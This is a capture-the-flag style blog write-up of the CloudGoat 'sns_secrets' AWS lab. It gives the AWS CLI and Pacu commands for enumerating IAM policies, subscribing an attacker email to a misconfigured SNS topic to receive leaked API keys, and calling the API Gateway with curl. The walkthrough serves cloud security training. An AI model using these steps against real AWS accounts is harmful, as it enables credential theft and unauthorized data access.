In today’s cloud-native world, developers rely heavily on services like AWS SNS (Simple Notification Service) to send alerts, logs, and system messages. But what happens when these services are misconfigured?

In this post, I’ll walk you through a real-world-inspired capstone scenario I solved, where secrets were unintentionally exposed via SNS. This write-up will demonstrate how attackers can escalate privileges and extract sensitive information from AWS if best practices aren’t followed.

AWS Simple Notification Service (SNS) is a pub/sub messaging service used to send messages between distributed systems. It supports multiple delivery formats like email, HTTP, Lambda, and SQS. While it’s a powerful tool, improper configuration of access permissions can lead to data leaks or privilege escalation.

Scenario Overview

• Name: sns_secrets
• Tool: CloudGoat (by Rhino Security Labs)
• Initial Access: Low-privileged IAM user
• Objective: Exploit misconfigured SNS topics to retrieve secrets stored in AWS Secrets Manager

Setup and Initial Access:

to start this scenario, we have to first setup the cloud goat in our machine, you will get details about it on CloudGoat GitHub repository. then below command will start the scenario and provide IAM user credentials

cloudgoat create sns_secrets

after getting credentials, configure them with a new profile and further use it for IAM enumeration, after that just confirm access by below command.

root@WinLi:~# aws sts get-caller-identity --profile sns

this will shows username, that helps to find more information about IAM user.

policies enumeration

check for inline policies attached to IAM user:

root@WinLi:~# aws iam list-user-policies --user-name cg-sns-user-cgidxi93qpes3g --profile sns
{
    "PolicyNames": [
        "cg-sns-user-policy-cgidxi93qpes3g"
    ]
}

and also check for what permission this policy allows us:

aws iam get-user-policy --user-name cg-sns-user-cgidxi93qpes3g --policy-name cg-sns-user-policy-cgidxi93qpes3g --profile sns
{
    "UserName": "cg-sns-user-cgidxi93qpes3g",
    "PolicyName": "cg-sns-user-policy-cgidxi93qpes3g",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "sns:Subscribe",
                    "sns:Receive",
                    "sns:ListSubscriptionsByTopic",
                    "sns:ListTopics",
                    "sns:GetTopicAttributes",
                    "iam:ListGroupsForUser",
                    "iam:ListUserPolicies",
                    "iam:GetUserPolicy",
                    "iam:ListAttachedUserPolicies",
                    "apigateway:GET"
                ],
                "Effect": "Allow",
                "Resource": "*"
            },
            {
                "Action": "apigateway:GET",
                "Effect": "Deny",
                "Resource": [
                    "arn:aws:apigateway:us-east-1::/apikeys",
                    "arn:aws:apigateway:us-east-1::/apikeys/*",
                    "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/methods/GET",
                    "arn:aws:apigateway:us-east-1::/restapis/*/methods/GET",
                    "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/integration",
                    "arn:aws:apigateway:us-east-1::/restapis/*/integration",
                    "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/methods/*/integration"
                ]
            }
        ]
    }
}

Pacu is a modular AWS exploitation framework created by Rhino Security Labs (the same team behind CloudGoat).

It helps attackers (or pentesters/red teamers) automate:

• Enumeration
• Privilege escalation
• Resource abuse
• Credential extraction
• Data exfiltration

if you want to get familiar with PACU, check out official documentation.

Pacu (pacu-dev:No Keys Set) >   import_keys sns-secrets

now there is pacu module which help to enumerate the permissions of IAM user (another way, AWS CLI is first way).

“whoami” uses to list the confirmed passwords

so while this is a SNS related capstone, pacu is capable for that also. another module “sns_enum”.

Pacu (sns:imported-sns) > run sns__enum --region us-east-1
  Running module sns__enum...
[sns__enum] Starting region us-east-1...
[sns__enum]   Found 1 topics
[sns__enum] sns__enum completed.
[sns__enum] MODULE SUMMARY:
Num of SNS topics found: 1
Num of SNS subscribers found: 0

see the Topic’s ARN by typing “data” to access the Pacu database for our session. this will used in “sns_subscribe” module.

sending the data to our (attacker controller) email address so we can confirm the subscription.

Pacu (sns:imported-sns) > run sns__subscribe --topics arn:aws:sns:us-east-1:676206926638:public-topic-cgidxi93qpes3g --email [email protected]
  Running module sns__subscribe...
[sns__subscribe] Subscribed successfully, check email for subscription confirmation. Confirmation ARN: arn:aws:sns:us-east-1:676206926638:public-topic-cgidxi93qpes3g:d57a831e-54c2-4dee-ae60-58b7fe0beb93
Pacu (sns:imported-sns) >

after confirmation, we will get a API GATEWAY key, notification comes every minute. until we stop it by our own.

now we have api gateway key, but we need a full URL so let’s enumerate.

Using this ID we can get the Gateway stages and resources. below commands will help you for that.

now we have all details to full fill the URL :

https://[API-ID].execute-api.us-east-1.amazonaws.com/[stageName]/[resourcePath]

• API-id: x93anl9mj7
• StageName: prod-cgidxi93qpes3g
• ResourcePath: /user-data

now final step to retrieve the final flag, use below curl command

curl -X GET "[API Gateway URL]" -H "x-api-key: 45a3da610dc64703b10e273a4db135bf"

FLAG:

Thanks for reading! If you found this helpful, follow me for more cloud security walkthroughs and hands-on write-ups. 🚀🔐